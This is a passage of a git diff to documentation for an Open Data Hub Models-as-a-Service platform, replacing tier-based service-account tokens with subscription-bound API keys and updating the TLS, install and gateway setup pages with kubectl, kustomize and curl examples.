-3. **Plan for Delays**: Expect a 5-minute delay for tier changes to affect active traffic.
-4. **Token Refresh**: Encourage users to refresh their tokens after significant tier changes to ensure correct monitoring attribution.
diff --git a/docs/content/configuration-and-management/tier-overview.md b/docs/content/configuration-and-management/tier-overview.md
deleted file mode 100644
index 2b71a8f99..000000000
--- a/docs/content/configuration-and-management/tier-overview.md
+++ /dev/null
@@ -1,27 +0,0 @@
-# Tier Management Overview
-
-This guide explains how to configure and manage subscription tiers for the MaaS Platform. Tiers enable differentiated service levels with varying access permissions, rate limits, and quotas.
-
-## Overview
-
-The tier system is driven by Kubernetes native objects and provides:
-
-- **Group-based access control**: Users are assigned tiers based on their Kubernetes group membership
-- **Namespace-scoped RBAC**: Each tier has its own namespace for permission management
-- **Dynamic tier resolution**: User tiers are resolved on each request
-- **Per-model authorization**: Access control is enforced at the model level
-- **Hierarchical precedence**: Users with multiple group memberships get the highest tier
-
-## Documentation Structure
-
-This tier management documentation is organized into three sections:
-
-1. **[Tier Overview](tier-overview.md)** (this document) - High-level overview of the tier system
-2. **[Tier Configuration](tier-configuration.md)** - Step-by-step configuration guide
-3. **[Tier Concepts](tier-concepts.md)** - Reference material explaining how the tier system works
-
-## Quick Start
-
-To get started with tier management, see the [Configuration Guide](tier-configuration.md).
-
-For detailed information about how the tier system works internally, see the [Tier Concepts](tier-concepts.md) documentation.
diff --git a/docs/content/configuration-and-management/tls-configuration.md b/docs/content/configuration-and-management/tls-configuration.md
index 729795e3a..5978e3f3a 100644
--- a/docs/content/configuration-and-management/tls-configuration.md
+++ b/docs/content/configuration-and-management/tls-configuration.md
@@ -46,12 +46,24 @@ Authorino handles two TLS-protected traffic flows:
 
 For ODH/RHOAI deployments, the inbound flow is a [platform pre-requisite](https://github.com/opendatahub-io/kserve/tree/release-v0.15/docs/samples/llmisvc/ocp-setup-for-GA#ssl-authorino) for secure `LLMInferenceService` communication; only the outbound configuration is needed for MaaS.
 
-For all deployments using `./scripts/deploy.sh` (both operator and kustomize modes with TLS enabled), both flows are configured automatically via `configure-authorino-tls.sh`.
+For all deployments using `./scripts/deploy.sh` (both operator and kustomize modes with TLS enabled), both flows are configured automatically via `scripts/setup-authorino-tls.sh`.
+
+!!! warning "Authorino TLS script modifies operator-managed resources"
+    The `scripts/setup-authorino-tls.sh` script patches Authorino's service and deployment directly. When run (automatically by `deploy.sh` or manually), it will annotate the Authorino service, patch the Authorino CR, and add environment variables to the Authorino deployment. Use `--disable-tls-backend` with `deploy.sh` to skip this if you manage Authorino TLS separately.
 
 #### Gateway → Authorino (Listener TLS)
 
 Enables TLS on Authorino's gRPC listener for incoming authentication requests from the Gateway.
 
+**Quick setup:** Run the standalone script (or let `deploy.sh` run it automatically):
+
+```bash
+./scripts/setup-authorino-tls.sh
+# Use AUTHORINO_NAMESPACE=rh-connectivity-link for RHCL
+```
+
+**Manual configuration:**
+
 ```bash
 # Annotate service for certificate generation
 kubectl annotate service authorino-authorino-authorization \
@@ -106,7 +118,7 @@ spec:
 
 #### Authorino → maas-api (Outbound TLS)
 
-Enables Authorino to make HTTPS calls to `maas-api` for tier metadata lookups. Requires the cluster CA bundle and SSL environment variables.
+Enables Authorino to make HTTPS calls to `maas-api` for metadata lookups (e.g., API key validation). Requires the cluster CA bundle and SSL environment variables.
 
 ```bash
 # Configure SSL environment variables for outbound HTTPS
diff --git a/docs/content/configuration-and-management/token-management.md b/docs/content/configuration-and-management/token-management.md
index fefa62abe..bf302ef90 100644
--- a/docs/content/configuration-and-management/token-management.md
+++ b/docs/content/configuration-and-management/token-management.md
@@ -1,21 +1,24 @@
 # Understanding Token Management
 
-This guide explains the token-based authentication system used to access models in the tier-based access control system. 
-It covers how token issuance works, the underlying service account architecture, and token lifecycle management.
+This guide explains the authentication and credential management used to access models in the MaaS Platform.
 
-!!! note
-    **Prerequisites**: This document assumes you have already configured tiers, RBAC, and rate limits. 
-    See [Configuring Subscription Tiers](tier-configuration.md) for setup instructions.
+!!! tip "API keys (current)"
+    The platform uses **API keys** (`sk-oai-*`) stored in PostgreSQL for programmatic access. Create keys via `POST /v1/api-keys` (authenticate with your OpenShift token) and use them with the `Authorization: Bearer` header. Each key is bound to one MaaSSubscription at creation time (optional `subscription` in the request body; if omitted, the **highest `spec.priority`** subscription you can access is chosen). See [Quota and Access Configuration](quota-and-access-configuration.md) and [Subscription Known Issues](subscription-known-issues.md).
+
+!!! note "Prerequisites"
+    This document assumes you have configured subscriptions (MaaSAuthPolicy, MaaSSubscription).
+    See [Quota and Access Configuration](quota-and-access-configuration.md) for setup.
 
 ---
 
 ## Table of Contents
 
 1. [Overview](#overview)
-1. [How Token Issuance Works](#how-token-issuance-works)
+1. [How API Key Creation Works](#how-api-key-creation-works)
+1. [How API Key Validation Works](#how-api-key-validation-works)
 1. [Model Discovery](#model-discovery)
 1. [Practical Usage](#practical-usage)
-1. [Token Lifecycle Management](#token-lifecycle-management)
+1. [API Key Lifecycle Management](#api-key-lifecycle-management)
 1. [Frequently Asked Questions (FAQ)](#frequently-asked-questions-faq)
 1. [Related Documentation](#related-documentation)
 
@@ -23,77 +26,104 @@ It covers how token issuance works, the underlying service account architecture,
 
 ## Overview
 
-The platform uses a secure, token-based authentication system. Instead of using your primary OpenShift credentials to 
-access models directly, you first exchange them for a temporary, specialized access token. This approach provides several key benefits:
+The platform uses a secure, API key–based authentication system. You authenticate with your OpenShift credentials to create long-lived API keys, which are stored as SHA-256 hashes in a PostgreSQL database. This approach provides several key benefits:
 
-- **Enhanced Security**: Tokens are short-lived, reducing the risk of compromised credentials. They are also narrowly scoped for model access only.
-- **Tier-Based Access Control**: The token you receive is automatically associated with your subscription tier (e.g., free, premium), ensuring you get the correct permissions and rate limits.
-- **Auditability**: Every request made with a token is tied to a specific identity and can be audited.
-- **Kubernetes-Native Integration**: The system leverages standard, Kubernetes authentication and authorization mechanisms.
+- **Long-Lived Credentials**: API keys remain valid until you revoke them or they expire (configurable), unlike short-lived Kubernetes tokens.
+- **Subscription-Based Access Control**: Keys inherit your group membership at creation time; the gateway uses these groups for subscription lookup and rate limits.
+- **Auditability**: Every request is tied to a specific key and identity; `last_used_at` tracks usage.
+- **Show-Once Security**: The plaintext key is returned only at creation; only the hash is stored.
 
 The process is simple:
 
 ```text
-You authenticate with OpenShift → Request a token from the API → Use that token to call models
+Authenticate with OpenShift → Create an API key via POST /v1/api-keys → Use the key with Authorization: Bearer for model access
 ```
 
 ---
 
-## How Token Issuance Works
+## How API Key Creation Works
 
-When you request a token, you are essentially trading your long-term OpenShift identity for a short-term, 
-purpose-built identity in the form of a Kubernetes Service Account.
+When you create an API key, you trade your OpenShift identity for a long-lived credential that can be used for programmatic access.
 
 ### Key Concepts
 
-- **Tier Namespace**: The platform maintains a separate Kubernetes namespace for each subscription tier (e.g., `...-tier-free`, `...-tier-premium`). These namespaces isolate users based on their access level. 
-- **Service Account (SA)**: When you request a token for the first time, the system creates a Service Account that represents you inside your designated tier namespace. This SA inherits all the permissions assigned to that tier.
-- **Access Token**: The token you receive is a standard JSON Web Token (JWT) that authenticates you as that specific Service Account. When you present this token to the gateway, the system knows your identity, your tier, and what permissions you have.
-- **Token Audience**: The intended recipient of your token. This is validated during authentication and must match the gateway's configuration.
-- **Token Expiration**: The time after which the token expires. Tokens are short-lived to reduce the risk of compromised credentials.
+- **Subscription binding**: Each key stores a MaaSSubscription name resolved at mint time. You can set it explicitly with the optional JSON field `subscription` on `POST /v1/api-keys`. If you omit it, the API selects your **highest-priority** accessible subscription (ties break deterministically—see operator notes below).
+- **Subscription access**: Your access is still determined by MaaSAuthPolicy and MaaSSubscription, which map groups to models and rate limits. The bound name is used for gateway subscription resolution and metering.
+- **User Groups**: At creation time, your current group membership is stored with the key. These groups are used for subscription-based authorization when the key is validated.
+- **API Key**: A cryptographically secure string with `sk-oai-*` prefix. The plaintext is shown once; only the SHA-256 hash is stored in PostgreSQL.
+- **Expiration**: Keys have a configurable TTL via `expiresIn` (e.g., `30d`, `90d`, `1h`). If omitted, the key defaults to the configured maximum (e.g., 90 days).
+
+The create response includes a `subscription` field echoing the bound subscription name.
 
-### Token Issuance Flow
+### API Key Creation Flow
 
-This diagram illustrates the process of obtaining a token.
+This diagram illustrates the process of creating an API key.
 
 ```mermaid
 sequenceDiagram
     participant User as OpenShift User
+    participant Gateway
+    participant AuthPolicy as AuthPolicy (Authorino)
     participant MaaS as maas-api
-    participant K8s as Kubernetes API
-    participant TierNS as Tier Namespace<br/>(e.g., *-tier-premium)
+    participant DB as PostgreSQL
+
+    Note over User,MaaS: API Key Creation
+    User->>Gateway: 1. POST /v1/api-keys (Bearer OpenShift token)
+    Gateway->>AuthPolicy: Route request
+    AuthPolicy->>AuthPolicy: Validate OpenShift token (TokenReview)
+    AuthPolicy->>MaaS: 2. Forward request + user context (username, groups)
+    MaaS->>MaaS: Generate sk-oai-* key, hash with SHA-256
+    MaaS->>MaaS: Resolve subscription (explicit or highest priority)
+    MaaS->>DB: 3. Store hash + metadata (username, groups, subscription, name, expiresAt)
+    DB-->>MaaS: Stored
+    MaaS-->>User: 4. Return plaintext key ONCE (never stored)
+
+    Note over User,DB: Key is ready for model access
+```
+
+---
+
+## How API Key Validation Works
+
+When you use an API key for inference, the gateway validates it via the MaaS API before allowing the request.
+
+### Validation Flow
+
+```mermaid
+sequenceDiagram
+    participant User as Client
     participant Gateway
+    participant AuthPolicy as MaaSAuthPolicy (Authorino)
+    participant MaaS as maas-api
+    participant DB as PostgreSQL
     participant Model as Model Backend
 
-    Note over User,MaaS: Token Issuance
-    User->>MaaS: 1. Authenticate with OpenShift token
-    MaaS->>K8s: Validate token (TokenReview)
-    K8s-->>MaaS: username, groups
-    Note right of MaaS: Determine tier from<br/>tier-to-group-mapping
-    MaaS->>K8s: Ensure tier namespace exists
-    K8s->>TierNS: Create if needed
-    MaaS->>TierNS: Create/get Service Account for user
-    TierNS-->>MaaS: SA ready
-    MaaS->>K8s: Request SA token (TokenRequest)
-    K8s-->>MaaS: Issued token
-    MaaS-->>User: Return issued token
-
-    Note over User,Model: Model Access
-    User->>Gateway: 3. Request with issued token
-    Gateway->>K8s: Validate token (TokenReview)
-    Note right of K8s: Token from SA in<br/>tier namespace
-    K8s-->>Gateway: Valid, with groups
-    Note right of Gateway: Tier lookup,<br/>SAR check,<br/>Rate limits
-    Gateway->>Model: 4. Authorized request
+    Note over User,MaaS: Inference Request
+    User->>Gateway: 1. Request with Authorization: Bearer sk-oai-*
+    Gateway->>AuthPolicy: Route to MaaSAuthPolicy
+    AuthPolicy->>MaaS: 2. POST /internal/v1/api-keys/validate (key)
+    MaaS->>MaaS: Hash key, lookup by hash
+    MaaS->>DB: 3. SELECT by key_hash
+    DB-->>MaaS: username, groups, subscription, status
+    MaaS->>MaaS: Check status (active/revoked/expired)
+    MaaS-->>AuthPolicy: 4. valid: true, userId, groups, subscription
+    AuthPolicy->>AuthPolicy: Subscription check, inject headers, rate limits
+    AuthPolicy->>Model: 5. Authorized request (identity headers)
     Model-->>Gateway: Response
     Gateway-->>User: Response
 ```
 
+The validation endpoint (`/internal/v1/api-keys/validate`) is called by Authorino on every request that bears an `sk-oai-*` token. It:
+
+1. Hashes the incoming key and looks it up in the database
+2. Returns `valid: true` with `userId`, `groups`, and `subscription` if the key is active and not expired
+3. Returns `valid: false` with a reason if the key is invalid, revoked, or expired
+
 ---
 
 ## Model Discovery
 
-The `/v1/models` endpoint allows you to discover which models you're authorized to access. This endpoint works with any valid authentication token — you don't need to create an API key first.
+The `/v1/models` endpoint allows you to discover which models you're authorized to access. This endpoint works with any valid authentication token — you can use your OpenShift token or an API key.
 
 ### How It Works
 
@@ -108,119 +138,125 @@ flowchart LR
 
 This means you can:
 
-1. **Authenticate with OpenShift or OIDC** — use your existing identity and the same token you would use for inference.
-2. **Call `/v1/models` immediately** — see only the models you can access, without creating an API key first.
+1. **Authenticate with OpenShift or OIDC** — use your existing identity token for `GET /v1/models` (optional `X-MaaS-Subscription` when you have multiple subscriptions).
+2. **Use an API key** — use your `sk-oai-*` key in the Authorization header for listing and for inference.
+3. **Call `/v1/models` immediately** — see only the models you can access, without creating an API key first (if using an OpenShift token).
 
-!!! info "Future: Token minting"
-    Once MaaS API token minting is in place, the implementation may be revisited (e.g. minting a short-lived token for gateway auth when the client's token has a different audience). For now, the Authorization header is always passed through as-is.
+!!! note "Inference vs listing"
+    Inference (calls to each model’s chat/completions URL) requires an API key in `Authorization: Bearer` only. Do not send `X-MaaS-Subscription` on inference—the subscription is the one bound at API key mint time. `GET /v1/models` accepts either an API key or an OpenShift token; with a user token, `X-MaaS-Subscription` remains supported for filtering.
 
 ---
 
 ## Practical Usage
 
-For step-by-step instructions on obtaining and using tokens to access models, including practical examples and troubleshooting, see the [Self-Service Model Access Guide](../user-guide/self-service-model-access.md).
+For step-by-step instructions on obtaining and using API keys to access models, including practical examples and troubleshooting, see the [Self-Service Model Access Guide](../user-guide/self-service-model-access.md).
 
 That guide provides:
 
 - Complete walkthrough for getting your OpenShift token
-- How to request an access token from the API
-- Examples of making inference requests with your token
+- How to create an API key via `POST /v1/api-keys`
+- Examples of making inference requests with your API key
 - Troubleshooting common authentication issues
 
 ---
 
-## Token Lifecycle Management
+## API Key Lifecycle Management
 
-Access tokens are ephemeral and must be managed accordingly.
+API keys are long-lived by default but support expiration and revocation.
 
-### Token Expiration
+### Key Expiration
 
-Tokens have a finite lifetime for security purposes:
+Keys have a configurable TTL:
 
-- **Default lifetime**: 4 hours (configurable when requesting)
-- **Maximum lifetime**: Determined by your Kubernetes cluster configuration
+- **Default**: Omit `expiresIn` in the create request; the key uses the configured maximum (e.g., 90 days).
+- **Custom TTL**: Set `expiresIn` when creating (e.g., `"90d"`, `"30d"`, `"1h"`). The response includes `expiresAt` (RFC3339).
 
-When a token expires, any API request using it will fail with an `HTTP 401 Unauthorized error`. 
-To continue, you must request a new token using the process described above.
+When a key expires, validation returns `valid: false` with reason `"key revoked or expired"`. Create a new key to continue.
 
-**Tips:**
+### Key Revocation
 
-- For interactive use, request tokens with a lifetime that covers your session (e.g., 4h).
-- For automated scripts or applications, implement logic to refresh the token proactively before it expires.
+**Revoke a single key:** Send a `DELETE` request to `/v1/api-keys/:id`.
 
-### Token Revocation
-
-You can invalidate all active tokens associated with your user account. This is a key security feature if you believe a token has been exposed.
+```bash
+curl -sSk -X DELETE "${MAAS_API_URL}/maas-api/v1/api-keys/${KEY_ID}" \
+  -H "Authorization: Bearer $(oc whoami -t)"
+```
 
-To revoke all your tokens, send a `DELETE` request to the `/v1/tokens` endpoint.
+**Bulk revoke all keys for a user:** Send a `POST` request to `/v1/api-keys/bulk-revoke`.
 
-```shell
-curl -sSk -X DELETE "${MAAS_API_URL}/v1/tokens" \
-  -H "Authorization: Bearer $(oc whoami -t)"
+```bash
+curl -sSk -X POST "${MAAS_API_URL}/maas-api/v1/api-keys/bulk-revoke" \
+  -H "Authorization: Bearer $(oc whoami -t)" \
+  -H "Content-Type: application/json" \
+  -d '{"username": "alice"}'
 ```
-This action immediately deletes your underlying Service Account, which invalidates all tokens that have ever been issued for it. 
-The Service Account will be automatically recreated the next time you request a token.
+
+Revocation updates the key status to `revoked` in the database. The next validation request will reject the key. Authorino may cache validation results briefly; revocation is effective as soon as the cache expires.
 
 !!! warning "Important"
-    **For Platform Administrators**: Admins can manually revoke a user's tokens by finding and deleting their Service Account 
-    in the appropriate tier namespace (e.g., `<instance-name>-tier-premium`). This is an effective way to immediately cut 
-    off access for a specific user in response to a security event.
+    **For Platform Administrators**: Admins can revoke any user's keys via `DELETE /v1/api-keys/:id` (if they own or have admin access) or `POST /v1/api-keys/bulk-revoke` with the target username. This is an effective way to immediately cut off access for a specific user in response to a security event.
 
 ---
 
 ## Frequently Asked Questions (FAQ)
 
-**Q: My tier is wrong or shows as "free". How do I fix it?**
+**Q: My subscription access is wrong. How do I fix it?**
+
+A: Your access is determined by your group membership in OpenShift at the time the API key was created. Those groups are stored with the key and used for authorization. The subscription name on the key is fixed at mint time; to use a different subscription, create another key with `"subscription": "<name>"`. If your groups have changed, create a new API key to pick up the new membership.
+
+---
+
+**Q: What if two MaaSSubscriptions use the same `spec.priority`?**
 
-A: Your tier is determined by your group membership in OpenShift. Contact your platform administrator to ensure you 
-are in the correct user group, which should be mapped to your desired tier in the [tier mapping configuration](tier-configuration.md).
+A: API key mint and subscription selection use a deterministic order when priorities tie (e.g. token limit, then name). Operators should still assign distinct priorities when possible. The MaaSSubscription controller sets status condition `SpecPriorityDuplicate` and logs when another subscription shares the same priority—use that to clean up configuration.
 
 ---
 
-**Q: How long should my tokens be valid for?**
+**Q: How long should my API keys be valid for?**
 
-A: It's a balance of security and convenience. For interactive command-line use, 1-8 hours is common. For applications, request shorter-lived tokens (e.g., 15-60 minutes) and refresh them automatically.
+A: For interactive use or long-running integrations, keys with long TTL (e.g., 90d) or the default maximum are common. For higher security, use shorter TTLs (e.g., 30d) and rotate keys periodically.
 
 ---
 
-**Q: Can I have multiple active tokens at once?**
+**Q: Can I have multiple active API keys at once?**
 
-A: Yes. Each call to the `/v1/tokens` endpoint issues a new, independent token. All of them will be valid until they expire or are revoked.
+A: Yes. Each call to `POST /v1/api-keys` creates a new, independent key. You can list and manage them via `POST /v1/api-keys/search` (with optional filters and pagination) or `GET /v1/api-keys/:id` for a specific key.
 
 ---
 
-**Q: What happens if the `maas-api` service is down?**
+**Q: What happens if the maas-api service is down?**
 
-A: You will not be able to issue *new* tokens. However, any existing, non-expired tokens will continue to work for calling models, as the gateway validates them directly with the Kubernetes API.
+A: You will not be able to create or validate API keys. Inference requests that use API keys will fail until the service is back.
 
 ---
 
-**Q: Can I use one token to access multiple different models?**
+**Q: Can I use one API key to access multiple different models?**
 
-A: Yes. Your token grants you access based on your tier's RBAC permissions. If your tier is authorized to use multiple models, a single token will work for all of them.
+A: Yes. Your API key is bound to a subscription at creation time. If that subscription provides access to multiple models, a single key works for all of them. To access models from a different subscription, create a new API key bound to that subscription.
 
 ---
 
 **Q: What's the difference between my OpenShift token and an API key?**
 
-A: Your **OpenShift token** is your identity token from authentication (e.g. OpenShift or OIDC). An **API key** (issued via `/v1/tokens`) is a service account token with the correct audience and permissions for accessing models. For **GET /v1/models**, the API passes your Authorization header as-is to each model endpoint to determine which models to include; you can use your OpenShift token or an API key. For inference, use a token that your gateway accepts (e.g. OpenShift token or API key as configured).
+A: Your **OpenShift token** is your identity token from authentication (e.g., OpenShift or OIDC). An **API key** is a long-lived credential created via `POST /v1/api-keys` and stored as a hash in PostgreSQL. For **GET /v1/models**, the API passes your Authorization header as-is to each model endpoint; you can use either. For inference, use API key.
 
 ---
 
 **Q: Do I need an API key to list available models?**
 
-A: No. Call **GET /v1/models** with your OpenShift/OIDC token (or any token your gateway accepts) in the Authorization header. The API uses that same header to probe each model endpoint and returns only models you can access.
+A: No. Call **GET /v1/models** with your OpenShift/OIDC token (or an API key) in the Authorization header. The API uses that same header to probe each model endpoint and returns only models you can access.
 
 ---
 
-**Q: What is "token audience" and why does it matter?**
+**Q: Where is my API key stored?**
 
-A: Token audience identifies the intended recipient of a token. Some gateways expect tokens with a specific audience. For **GET /v1/models**, the API does not modify or exchange your token; it forwards your Authorization header as-is. Once token minting is in place, audience handling may be revisited.
+A: Only the SHA-256 hash of your key is stored in PostgreSQL. The plaintext key is returned once at creation and is never stored. If you lose it, you must create a new key.
 
 ---
 
 ## Related Documentation
 
-- **[Configuring Subscription Tiers](tier-configuration.md)**: For operators - tier setup, RBAC, and rate limiting configuration
+- **[Quota and Access Configuration](quota-and-access-configuration.md)**: For operators - subscription setup, access control, and rate limiting
+- **[Self-Service Model Access](../user-guide/self-service-model-access.md)**: Step-by-step guide for creating and using API keys
 
 ---
diff --git a/docs/content/index.md b/docs/content/index.md
index 43b149015..beb90168e 100644
--- a/docs/content/index.md
+++ b/docs/content/index.md
@@ -2,7 +2,7 @@
 
 Welcome to the Models-as-a-Service (MaaS) Platform documentation.
 
-The MaaS Platform enhances the model serving capabilities of [Open Data Hub](https://github.com/opendatahub-io) by adding a management layer for self-service access control, rate limiting, and tier-based subscriptions.
+The MaaS Platform enhances the model serving capabilities of [Open Data Hub](https://github.com/opendatahub-io) by adding a management layer for self-service access control, rate limiting, and subscription-based entitlements.
 
 Use this platform to streamline the deployment of your models, monitor usage, and effectively manage costs.
 
@@ -15,10 +15,27 @@ Use this platform to streamline the deployment of your models, monitor usage, an
 
 ### ⚙️ Configuration & Management
 
-- **[Tier Management](configuration-and-management/tier-overview.md)** - Configuring subscription tiers and access control
-- **[Model Setup](configuration-and-management/model-setup.md)** - Setting up models for MaaS
+- **[Access and Quota Overview](configuration-and-management/subscription-overview.md)** - Policies (access) and subscriptions (quota) for model access
+- **[Model Setup (On Cluster)](configuration-and-management/model-setup.md)** - Setting up models for MaaS
 - **[Self-Service Model Access](user-guide/self-service-model-access.md)** - Managing model access and policies
 
+### 📋 Release Notes
+
+
 ### 🔧 Advanced Administration
 
 - **[Observability](advanced-administration/observability.md)** - Monitoring, metrics, and dashboards
+- **[Limitador Persistence](advanced-administration/limitador-persistence.md)** - Redis backend for persistent rate-limit counters
+- **[TLS Configuration](configuration-and-management/tls-configuration.md)** - Configuring TLS for MaaS API, Authorino, and Gateway
+- **[Token Management](configuration-and-management/token-management.md)** - Token authentication system and lifecycle
+
+### 📖 Installation Guide
+
+- **[Prerequisites](install/prerequisites.md)** - Requirements and database setup
+- **[Platform Setup](install/platform-setup.md)** - Install ODH/RHOAI with MaaS
+- **[MaaS Setup](install/maas-setup.md)** - Gateway AuthPolicy and policies
+- **[Validation](install/validation.md)** - Verify your deployment
+
+### 🔄 Migration
+
+- **[Tier to Subscription Migration](migration/tier-to-subscription.md)** - Migrate from tier-based to subscription-based access control
diff --git a/docs/content/install/maas-setup.md b/docs/content/install/maas-setup.md
index 7b3a8f629..7f5815011 100644
--- a/docs/content/install/maas-setup.md
+++ b/docs/content/install/maas-setup.md
@@ -1,53 +1,192 @@
 # Install MaaS Components
 
-## Prerequisites
+Complete [Operator Setup](platform-setup.md) before proceeding.
 
-!!! warning "Database Required"
-    Before enabling MaaS, you **must** create the `maas-db-config` Secret with your PostgreSQL database connection URL.
+**Installation flow:**
 
-    See the [Database Prerequisites](prerequisites.md#database-prerequisite) for detailed setup instructions and database options.
+1. [Database Setup](#database-setup) — Create the PostgreSQL connection Secret
+2. [Create Gateway](#create-gateway) — Deploy maas-default-gateway (required before modelsAsService)
+3. [Configure DataScienceCluster](#configure-datasciencecluster) — Enable KServe and modelsAsService in your DataScienceCluster
+4. [Model Setup (On Cluster)](model-setup.md) — Deploy sample models
+5. [Validation](validation.md) — Verify the deployment
 
-## Enable MaaS in DataScienceCluster
+## Database Setup
 
-After creating the database Secret, enable MaaS in your DataScienceCluster (set `modelsAsService.managementState: Managed`
-in the `spec.components.kserve` section - see [platform setup guide](platform-setup.md#install-platform-with-model-serving)
-for the complete configuration).
+A PostgreSQL database is required. Create the `maas-db-config` Secret in your ODH/RHOAI namespace (typically `opendatahub` for ODH or `redhat-ods-applications` for RHOAI):
 
-The operator will automatically deploy:
-
-- **MaaS API** (Deployment, Service, ServiceAccount, ClusterRole, ClusterRoleBinding, HTTPRoute)
-- **MaaS API AuthPolicy** (maas-api-auth-policy) - Protects the MaaS API endpoint
-- **NetworkPolicy** (maas-authorino-allow) - Allows Authorino to reach MaaS API
-
-## Manual Installation Steps
-
-You must manually install the following components after completing the [platform setup](platform-setup.md)
-(which includes creating the required `maas-default-gateway`):
-
-The tools you will need:
+```bash
+kubectl create secret generic maas-db-config \
+  -n opendatahub \
+  --from-literal=DB_CONNECTION_URL='postgresql://username:password@hostname:5432/database?sslmode=require'
+```
 
-* `kubectl` or `oc` client (this guide uses `kubectl`)
-* `kustomize`
-* `envsubst`
+**Connection string format:**
+```
+postgresql://USERNAME:PASSWORD@HOSTNAME:PORT/DATABASE?sslmode=require
+```
 
-## Install Gateway AuthPolicy
+!!! note "Development"
+    For development, you can deploy a PostgreSQL instance and Secret using the setup script:
+
+    ```bash
+    ./scripts/setup-database.sh
+    ```
+
+    Use `NAMESPACE=redhat-ods-applications` for RHOAI. The full `scripts/deploy.sh` script also creates PostgreSQL automatically when deploying MaaS.
+
+!!! note "Restarting maas-api"
+    If you add or update the Secret after the DataScienceCluster already has modelsAsService in managed state, restart the maas-api deployment to pick up the config:
+
+    ```bash
+    kubectl rollout restart deployment/maas-api -n opendatahub
+    ```
+
+    This is not required when the Secret exists before enabling modelsAsService in your DataScienceCluster.
+
+## Create Gateway
+
+The Gateway must exist before enabling modelsAsService in your DataScienceCluster. Create the MaaS Gateway:
+
+!!! warning "Example Gateway Configuration"
+    The Gateway configuration below is an example. You may need TLS certificates, specific listener settings, or custom infrastructure labels depending on your cluster. For TLS setup, see [TLS Configuration](../configuration-and-management/tls-configuration.md). To quickly apply Authorino TLS for maas-api communication, run:
+
+    ```bash
+    ./scripts/setup-authorino-tls.sh
+    ```
+
+```yaml
+CLUSTER_DOMAIN=$(kubectl get ingresses.config.openshift.io cluster -o jsonpath='{.spec.domain}')
+# Use default ingress cert for HTTPS, or set CERT_NAME to your TLS secret name
+CERT_NAME=${CERT_NAME:-$(kubectl get ingresscontroller default -n openshift-ingress-operator -o jsonpath='{.spec.defaultCertificate.name}' 2>/dev/null)}
+[[ -z "$CERT_NAME" ]] && CERT_NAME="router-certs-default"
+
+kubectl apply -f - <<EOF
+apiVersion: gateway.networking.k8s.io/v1
+kind: Gateway
+metadata:
+  name: maas-default-gateway
+  namespace: openshift-ingress
+spec:
+  gatewayClassName: openshift-default
+  listeners:
+   - name: http
+     hostname: maas.${CLUSTER_DOMAIN}
+     port: 80
+     protocol: HTTP
+     allowedRoutes:
+       namespaces:
+         from: All
+   - name: https
+     hostname: maas.${CLUSTER_DOMAIN}
+     port: 443
+     protocol: HTTPS
+     allowedRoutes:
+       namespaces:
+         from: All
+     tls:
+       certificateRefs:
+       - group: ""
+         kind: Secret
+         name: ${CERT_NAME}
+       mode: Terminate
+EOF
+```
 
-The maas-controller deploys gateway-level AuthPolicy and TokenRateLimitPolicy from
-`deployment/base/maas-controller/policies`. When using the ODH overlay or deploy script, these
-are applied automatically. For manual install:
+!!! note "TLS certificate"
+    The HTTPS listener uses a Secret in `openshift-ingress`. The script auto-detects the default ingress cert; if that fails, it uses `router-certs-default`. If the Gateway fails to program, ensure the Secret exists: `kubectl get secret -n openshift-ingress`. See [TLS Configuration](../configuration-and-management/tls-configuration.md) for custom certs.
 
 ```shell
-kubectl apply --server-side=true \
-  -f <(kustomize build "https://github.com/opendatahub-io/models-as-a-service.git/deployment/base/maas-controller/policies?ref=main")
+kubectl wait --for=condition=Programmed gateway/maas-default-gateway -n openshift-ingress --timeout=60s
 ```
 
-!!! note "Custom Token Review Audience"
-    If you encounter `401 Unauthorized` errors when obtaining tokens, your cluster may use a custom token review audience. See [Troubleshooting - 401 Errors](validation.md#common-issues) for detection and resolution steps.
+## Configure DataScienceCluster
+
+After creating the database Secret and Gateways, create or update your DataScienceCluster. Choose your deployment method:
+
+=== "Managed (Recommended)"
+
+    The operator deploys and manages the MaaS API. Create or update your DataScienceCluster with `modelsAsService` in Managed state:
+
+    ```yaml
+    kubectl apply -f - <<EOF
+    apiVersion: datasciencecluster.opendatahub.io/v2
+    kind: DataScienceCluster
+    metadata:
+      name: default-dsc
+    spec:
+      components:
+        kserve:
+          managementState: Managed
+          rawDeploymentServiceConfig: Headed
+          modelsAsService:
+            managementState: Managed
+        dashboard:
+          managementState: Managed
+    EOF
+    ```
+
+    !!! note "Connectivity Link warning (ODH with Kuadrant)"
+        When using ODH with Kuadrant (upstream), you may see `Warning: Red Hat Connectivity Link is not installed, LLMInferenceService cannot be used` in the Kserve status initially. This typically resolves after a few minutes as the operator reconciles. If it persists, apply the `scripts/workaround-odh-rhcl-check.yaml` workaround.
+
+    **Validate DataScienceCluster:**
+
+    ```bash
+    # Check DataScienceCluster status
+    kubectl get datasciencecluster default-dsc
+
+    # Wait for KServe and ModelsAsService to be ready (optional)
+    kubectl wait --for=jsonpath='{.status.conditions[?(@.type=="KserveReady")].status}'=True \
+      datasciencecluster/default-dsc --timeout=300s
+    kubectl wait --for=jsonpath='{.status.conditions[?(@.type=="ModelControllerReady")].status}'=True \
+      datasciencecluster/default-dsc --timeout=300s
+
+    # Verify maas-api deployment is running (use opendatahub for ODH, redhat-ods-applications for RHOAI)
+    kubectl get deployment maas-api -n opendatahub
+    kubectl rollout status deployment/maas-api -n opendatahub --timeout=120s
+    ```
+
+    The operator will automatically deploy:
+
+    - **MaaS API** (Deployment, Service, ServiceAccount, ClusterRole, ClusterRoleBinding, HTTPRoute)
+    - **MaaS API AuthPolicy** (maas-api-auth-policy) - Protects the MaaS API endpoint
+    - **NetworkPolicy** (maas-authorino-allow) - Allows Authorino to reach MaaS API
+
+=== "Kustomize"
+
+    !!! note "Development and early testing"
+        Kustomize deployment can be used for **development and early testing purposes**. For production, use the Managed tab above.
+
+    Set `modelsAsService` to **Unmanaged** so the operator does not deploy the MaaS API, then deploy MaaS via the ODH overlay:
+
+    ```yaml
+    kubectl apply -f - <<EOF
+    apiVersion: datasciencecluster.opendatahub.io/v2
+    kind: DataScienceCluster
+    metadata:
+      name: default-dsc
+    spec:
+      components:
+        kserve:
+          managementState: Managed
+          rawDeploymentServiceConfig: Headed
+          modelsAsService:
+            managementState: Removed
+        dashboard:
+          managementState: Managed
+    EOF
+    ```
+
+    Apply the ODH overlay to deploy the MaaS API and controller (run from the project root; ensure the `maas-db-config` Secret exists per [Database Setup](#database-setup)):
+
+    ```bash
+    kustomize build deployment/overlays/odh | kubectl apply -f -
+    ```
+
+!!! tip "Troubleshooting"
